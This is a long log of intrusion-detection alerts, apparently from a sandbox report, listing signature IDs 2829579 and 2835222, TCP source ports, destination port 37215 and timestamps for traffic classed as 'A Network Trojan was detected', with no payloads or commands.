                  SID:2829579
                  Source Port:48278
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.460857
                  SID:2829579
                  Source Port:37584
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.147730
                  SID:2829579
                  Source Port:38398
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.879999
                  SID:2829579
                  Source Port:60250
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.507849
                  SID:2829579
                  Source Port:60098
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.539411
                  SID:2829579
                  Source Port:46458
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.515312
                  SID:2829579
                  Source Port:35918
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.107055
                  SID:2829579
                  Source Port:49440
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.322719
                  SID:2835222
                  Source Port:57562
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.992323
                  SID:2829579
                  Source Port:54078
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.816955
                  SID:2829579
                  Source Port:54070
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.536379
                  SID:2829579
                  Source Port:49222
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.793732
                  SID:2829579
                  Source Port:46824
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.953506
                  SID:2835222
                  Source Port:47654
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.617343
                  SID:2835222
                  Source Port:54872
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.240664
                  SID:2829579
                  Source Port:43686
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.777206
                  SID:2835222
                  Source Port:55500
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.784576
                  SID:2835222
                  Source Port:58320
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.626049
                  SID:2835222
                  Source Port:37548
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.190243
                  SID:2835222
                  Source Port:45828
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.633686
                  SID:2829579
                  Source Port:55904
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.149844
                  SID:2829579
                  Source Port:52450
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.663934
                  SID:2829579
                  Source Port:41574
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.844499
                  SID:2829579
                  Source Port:53000
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.720199
                  SID:2829579
                  Source Port:34078
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.102100
                  SID:2829579
                  Source Port:44240
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.163791
                  SID:2829579
                  Source Port:44840
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.881879
                  SID:2835222
                  Source Port:46724
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.108287
                  SID:2829579
                  Source Port:57938
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.429054
                  SID:2835222
                  Source Port:48120
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.290306
                  SID:2829579
                  Source Port:32928
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.172651
                  SID:2835222
                  Source Port:57064
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.446106
                  SID:2829579
                  Source Port:41256
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.014654
                  SID:2835222
                  Source Port:48268
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.761894
                  SID:2835222
                  Source Port:43506
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.580487
                  SID:2835222
                  Source Port:34400
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.502919
                  SID:2835222
                  Source Port:59724
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.567021
                  SID:2829579
                  Source Port:53112
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.369458
                  SID:2835222
                  Source Port:59936
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.151751
                  SID:2835222
                  Source Port:35208
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.146990
                  SID:2835222
                  Source Port:58314
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.177023
                  SID:2829579
                  Source Port:59540
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.768053
                  SID:2835222
                  Source Port:40982
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.168343
                  SID:2829579
                  Source Port:42508
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.505910
                  SID:2835222
                  Source Port:56898
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.538369
                  SID:2835222
                  Source Port:39142
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.688567
                  SID:2835222
                  Source Port:59292
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.958280
                  SID:2829579
                  Source Port:50928
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.953100
                  SID:2829579
                  Source Port:47754
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.612080
                  SID:2835222
                  Source Port:44456
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.453874
                  SID:2835222
                  Source Port:33786
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.586022
                  SID:2829579
                  Source Port:50304
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.180230
                  SID:2835222
                  Source Port:51822
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.369458
                  SID:2835222
                  Source Port:49008
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.865689
                  SID:2829579
                  Source Port:54810
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.624667
                  SID:2829579
                  Source Port:36962
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.352248
                  SID:2835222
                  Source Port:56032
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.988498
                  SID:2829579
                  Source Port:51062
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.687075
                  SID:2835222
                  Source Port:41286
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.775624
                  SID:2835222
                  Source Port:60966
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.359081
                  SID:2829579
                  Source Port:41922
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.696210
                  SID:2829579
                  Source Port:36544
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.522162
                  SID:2835222
                  Source Port:56262
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.526504
                  SID:2835222
                  Source Port:41526
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.668084
                  SID:2829579
                  Source Port:39794
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.636858
                  SID:2835222
                  Source Port:34908
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.421188
                  SID:2835222
                  Source Port:56550
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.154105
                  SID:2829579
                  Source Port:37182
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.822671
                  SID:2829579
                  Source Port:49672
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.239188
                  SID:2835222
                  Source Port:51358
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.642879
                  SID:2835222
                  Source Port:58354
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.661383
                  SID:2835222
                  Source Port:60662
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.395679
                  SID:2835222
                  Source Port:36418
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.907599
                  SID:2829579
                  Source Port:43956
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.191147
                  SID:2829579
                  Source Port:50200
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.881342
                  SID:2829579
                  Source Port:33558
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.721683
                  SID:2829579
                  Source Port:47810
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.915722
                  SID:2835222
                  Source Port:40346
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.200630
                  SID:2835222
                  Source Port:55840
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.106288
                  SID:2829579
                  Source Port:50990
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.182553
                  SID:2829579
                  Source Port:50766
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.749012
                  SID:2829579
                  Source Port:37270
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.254962
                  SID:2829579
                  Source Port:52906
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.593481
                  SID:2829579
                  Source Port:38014
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.621724
                  SID:2829579
                  Source Port:57918
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.011560
                  SID:2835222
                  Source Port:38408
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.867822
                  SID:2829579
                  Source Port:49224
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.538016
                  SID:2829579
                  Source Port:42292
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.860796
                  SID:2829579
                  Source Port:56150
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.483064
                  SID:2829579
                  Source Port:59618
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.165302
                  SID:2835222
                  Source Port:53108
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.112679
                  SID:2835222
                  Source Port:56734
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.013363
                  SID:2835222
                  Source Port:44498
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.657807
                  SID:2835222
                  Source Port:45234
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.472766
                  SID:2835222
                  Source Port:60984
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.191310
                  SID:2829579
                  Source Port:37988
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.165176
                  SID:2829579
                  Source Port:57946
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.920658
                  SID:2829579
                  Source Port:40820
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.838932
                  SID:2835222
                  Source Port:39786
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.519019
                  SID:2835222
                  Source Port:34180
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.251063
                  SID:2835222
                  Source Port:44338
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.477579
                  SID:2835222
                  Source Port:35130
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.932722
                  SID:2829579
                  Source Port:53938
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.068814
                  SID:2835222
                  Source Port:59168
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.199033
                  SID:2829579
                  Source Port:39486
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.772276
                  SID:2835222
                  Source Port:49518
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.824367
                  SID:2829579
                  Source Port:45926
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.961222
                  SID:2835222
                  Source Port:51506
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.002515
                  SID:2829579
                  Source Port:35714
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.950473
                  SID:2829579
                  Source Port:46680
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.021338
                  SID:2829579
                  Source Port:49520
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.850247
                  SID:2835222
                  Source Port:46078
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.083011
                  SID:2835222
                  Source Port:44438
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.415966
                  SID:2829579
                  Source Port:38314
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.576227
                  SID:2835222
                  Source Port:56156
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.739677
                  SID:2829579
                  Source Port:55232
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.222774
                  SID:2829579
                  Source Port:41818
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.124303
                  SID:2829579
                  Source Port:33280
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.640182
                  SID:2835222
                  Source Port:34872
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.801528
                  SID:2829579
                  Source Port:38852
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.278203
                  SID:2829579
                  Source Port:43322
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.161578
                  SID:2835222
                  Source Port:46678
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.506153
                  SID:2829579
                  Source Port:46302
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.204564
                  SID:2829579
                  Source Port:51170
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.768377
                  SID:2835222
                  Source Port:58636
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.148686
                  SID:2829579
                  Source Port:34416
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.912574
                  SID:2835222
                  Source Port:58848
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.679594
                  SID:2835222
                  Source Port:48614
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.658896
                  SID:2829579
                  Source Port:34358
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:44.496105
                  SID:2829579
                  Source Port:49154
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.133691
                  SID:2835222
                  Source Port:33992
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.867298
                  SID:2835222
                  Source Port:51262
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.810848
                  SID:2829579
                  Source Port:38134
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.893458
                  SID:2829579
                  Source Port:36780
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.909611
                  SID:2835222
                  Source Port:47008
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.440683
                  SID:2829579
                  Source Port:39994
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.397388
                  SID:2835222
                  Source Port:50392
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.093264
                  SID:2829579
                  Source Port:54490
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.665617
                  SID:2829579
                  Source Port:37350
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.853206
                  SID:2835222
                  Source Port:45566
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.771474
                  SID:2835222
                  Source Port:40162
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.161951
                  SID:2829579
                  Source Port:38202
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.800438
                  SID:2829579
                  Source Port:43382
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.837323
                  SID:2829579
                  Source Port:33968
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.406060
                  SID:2835222
                  Source Port:35542
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.862104
                  SID:2829579
                  Source Port:47342
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.593421
                  SID:2829579
                  Source Port:58266
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.960962
                  SID:2829579
                  Source Port:52796
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.216648
                  SID:2829579
                  Source Port:51002
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.339943
                  SID:2835222
                  Source Port:45330
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.436856
                  SID:2829579
                  Source Port:56038
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.429801
                  SID:2835222
                  Source Port:35004
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.332211
                  SID:2829579
                  Source Port:58104
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.384495
                  SID:2835222
                  Source Port:43554
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.538222
                  SID:2835222
                  Source Port:35830
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.516990
                  SID:2829579
                  Source Port:48036
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.907475
                  SID:2835222
                  Source Port:37942
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.973099
                  SID:2835222
                  Source Port:58572
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.881507
                  SID:2829579
                  Source Port:42632
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.821657
                  SID:2835222
                  Source Port:53818
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.184506
                  SID:2835222
                  Source Port:56992
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.051851
                  SID:2835222
                  Source Port:47922
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.810872
                  SID:2835222
                  Source Port:55602
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.659815
                  SID:2835222
                  Source Port:51318
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.297905
                  SID:2835222
                  Source Port:37696
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.692447
                  SID:2829579
                  Source Port:50932
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.605259
                  SID:2835222
                  Source Port:52770
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.393644
                  SID:2829579
                  Source Port:47522
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.903995
                  SID:2829579
                  Source Port:34882
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.707207
                  SID:2829579
                  Source Port:52414
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.771474
                  SID:2835222
                  Source Port:35844
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.058453
                  SID:2835222
                  Source Port:50652
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.609490
                  SID:2829579
                  Source Port:39840
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.827757
                  SID:2829579
                  Source Port:50902
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.542013
                  SID:2829579
                  Source Port:53712
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.335498
                  SID:2835222
                  Source Port:59964
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.378421
                  SID:2835222
                  Source Port:47960
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.102239
                  SID:2835222
                  Source Port:39196
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.611492
                  SID:2835222
                  Source Port:39272
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.863038
                  SID:2835222
                  Source Port:47816
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.479148
                  SID:2835222
                  Source Port:36310
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.532374
                  SID:2829579
                  Source Port:52304
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.869473
                  SID:2829579
                  Source Port:58280
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
